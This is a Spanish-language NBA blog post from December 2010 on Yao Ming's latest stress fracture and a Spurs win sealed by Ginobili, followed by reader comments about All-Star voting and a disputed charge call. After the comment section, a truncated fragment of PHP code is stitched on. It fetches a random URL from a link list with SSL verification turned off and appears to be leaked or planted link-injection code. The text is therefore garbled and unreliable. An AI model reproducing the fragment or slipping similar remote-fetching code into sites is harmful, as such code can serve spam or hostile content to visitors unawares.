La Crónica (16/12/2010): ¿Adiós al gigante chino?

17 de December de 2010 por TheDeerHunter

“I haven’t died,” he said. “Right now I’m drinking a beer and eating fried chicken. What were you expecting, a funeral?” – Yao.

Lamentablemente no abrimos con una noticia. No lo es que Yao Ming, a punto de volver según su versión hace pocos días confirmó que estará apartado de la competición por la enésima fractura de estrés. De sus propias palabras se desprende la mala pinta. Huele a retirada.

En el ámbito deportivo asistimos por segunda noche consecutiva a un partidazo de los que hacen afición. Después de matar el partido anoche en el último instante Manudona ayer lo volvió a hacer pero desde la defensa. Le sacó una falta en ataque increíble en el último segundo a Melo justo un instante después de haber puesto a su equipo 1 arriba con una canasta que sólo los genios son capaces de anotar. Antes de eso Duncan nos recordó quién ha sido el más grande en lo suyo y pudimos disfrutar de la mejor versión de Parker, Melo, Nené, Afflalo, Lawson… casi nada. Perdonadme la licencia de repetirme: I love this game… Y esta noche el Knicks-Heat por la tele. ¡Ay omá…!!

Después hubo baño de los Celtics a los Hawks, que este año parecen menos capacitados que nunca para ganar a ningún coco del Este. Las estrellas del equipo fueron Marvin Williams y Jeff Teague, con eso que os diga… Por los Celtics parece que Robinson no llegó a matarse en la celebración de ayer y hasta 6 verdes se pusieron en dobles figuras sin despeinarse. Eso sí, Erden… jugando de pívot habría que coger algún rebote ¿no?

Por último los Nets consiguieron su 7ª victoria a costa de los Wizards con Devin Harris tirando del carro.  Partido malo de consideración con 40 pérdidas de balón, 20 por equipo. ¡A segunda!, ¡oeeé!!!

MVP: Particularmente ya tenía ganas de darle uno al más grande entre los grandes. Tim Duncan con 28 puntos 16 rebotes 4 asistencias, aunque no me voy a ir de aquí sin volver mencionar a Manu Ginobili tan decisivo en el tramo final. Hay que decirlo más: ¡Manu all star!!!

El rookie: Trevo Booker rozó el doble doble con 11 puntos, 9 rebotes, 1 asistencia y 1 robo… pero su equipo perdió y él estuvo tremendamente fallón en el tiro.

La sorpresa: La pareja Marvin Williams-Jeff Teague como líderes de unos Hawks en crisis existencial. No sé decir si es un dato positivo o negativo.

La decepción:  Supongo que quien más y quien menos esperaba tarde o temprano alguna mala noticia con respecto a Yao, así que no será nuestra decepción del día. En cambio el partidazo de Josh Smith… es incalificable.

El mayor esfuerzo en vano: Cuando Melo recibió el balón a 4 segundos para el final sólo tenía una cosa entre ceja y ceja: la canasta. Lo malo es que entre él y ella también estaba un argentino con mucha mala idea.

Comenta

11 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Ojo… que Pau está en las mejores condiciones de su carrera de ser titular en el all-star. Tras Kobe y Durant en el Oeste más la típica anomalía china tenemos a Gasol. Marc tampoco lo tiene demasiado mal si Yao, como es lógico no va. El segundo pívot es Bynum (sería titular) y después viene Haywood (¿mande??) y Marc.
    El quinteto del Oeste sería ahora mismo: CP3-Kobe-Durant-Pau-Bynum
    y el del Este: Rondo-Wade-LeBron-Garnett-Howard

    Me voy corriendo a votar a Rose, a Stat, a Manu, a Deron… y a Pau y Marc ¿qué narices?

      Citar

  2. Busky23 dice:
    #2

    Lo de los pivots es ridículo,bynum titular :0????,dentro de la mediocridad yo he votado a Marc por supuesto,pero para mi Nene debería ser el titular,igual que Deron,siempre olvidado aunque demuestre partido a partido ser el mejor base del momento.
    En el Este,mi quinteto es Rose-Wade-Lebron-Stat- Howard y a correr!!!,Rondo también lo merece pero me decanto po Rose.
    Yao R.I.P,descanse en paz.
    Manu All Star,claro que si!!!!

      Citar

  3. Serrano dice:
    #3

    Buenas,

    Me suena de que si algún jugador elegido por los aficionados no puede jugar por lesión el sustituto lo elige el comisionado de la Liga, es decir Stern. Y no es el segundo en la clasificación.

    Un saludo y seguir igual

      Citar

  4. Ru dice:
    #4

    OESTE

    Lo de Yao normal,es más,espero que lo sigan votando aún a sabiendas de que es imposible que acuda para que el All Stars para que el Commish elija a Blake Griffin en lugar de Yao,aún siendo un forward en las votaciones.Un quinteto CP3-Kobe-Durant-Blake Griffin-Pau sería mucho más justo que cualquier combinación Pau + cualquier otro pívot,llámese Bynum(no ha jugado nada),Haywood(beneficiado por el tirón de Mavs este año) o Marc(que en Memphis no destaca estadísticamente demasiado).

    Por lo demás una pena que Kevin Love esté tan abajo pero es lo que tiene competir contra tantos buenísimos jugadores.Ya lo sufrimos los españoles con Pau unos cuantos años.Lo único que cabría esperar es que los veteranos tipo Duncan o Nowitzki no quieran ir para no derrochar energías.

    ESTE

    Lo único a destacar que a día de hoy lo más justo sería que Stoudemire estuviera por delante de Garnett y que los jugadores de los Hawks tienen poquísimo tirón.

      Citar

  5. -=TheKing=- dice:
    #5

    Oye seguro que lo de Carmelo es falta en ataque??????? a mí me da que Ginobili llega muy tarde, moviendose y que se deja caero como sólo un argentino podría hacer.

    La actuación de Duncan me hace seguir pensando que es el jugador más inteligente que he visto en mi vida, seguido por Stockton y Jordan.

      Citar

  6. Roberto dice:
    #6

    #4

    “a mí me da que Ginobili llega muy tarde, moviendose y que se deja caero como sólo un argentino podría hacer”

    ¿Qué quisiste decir con eso?, ¿como la xenofobia se puede meter en un comentario de básket?. Una bajeza lo tuyo, muy triste.

      Citar

  7. Mariano dice:
    #7

    The King, yo creo que no queda duda alguna de que fue falta ofensiva..

    Fue una de las mas claras que he visto..

    Llega justo a tiempo, se planta, y recibe la carga en el pecho..

    Manudo, ojalá lo voten para el All Star..

    Tambien metió la canasta, increible por cierto, que les dió el partido..

      Citar

  8. TheDeerHunter dice:
    #8

    @Roberto, creo que te confundes con el comentario de TheKing. Yo creo que por aquí les tenemos a los argentinos en muy alta estima deportiva. Me parece que aquí el compañero hacía un cumplido… por lo pillos e inteligentes jugando que suelen ser los argentinos y en particular Manudo.

    Yo creo que la falta en ataque es la regla baloncestística más difícil de pitar pero creo que Manu llega muy rápido, planta los pies en el suelo y le da tiempo justo para cuadrarse y recibir la carga.
    Para mí es falta en ataque.

      Citar

  9. Denise dice:
    #9

    Otra vez lesionado Yao?? Entonces lo veo el año que viene jugando en los Heat o en los Celtics 15 partidos y cobrando el mínimo.

      Citar

  10. -=TheKing=- dice:
    #10

    No era para que nadie se lo tome a mal, en España siempre se ha dicho que los argetinos tienen fama de ser buenos en ese tipo de acciones y los italianos en protestar al árbitro pero bueno tampoco quería ofender, lo siento de todas formas.

      Citar

  11. Txusma dice:
    #11

    Tremenda noticia para todos los q juegan en ligas fantásticas y tienen en su plantilla al chino…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>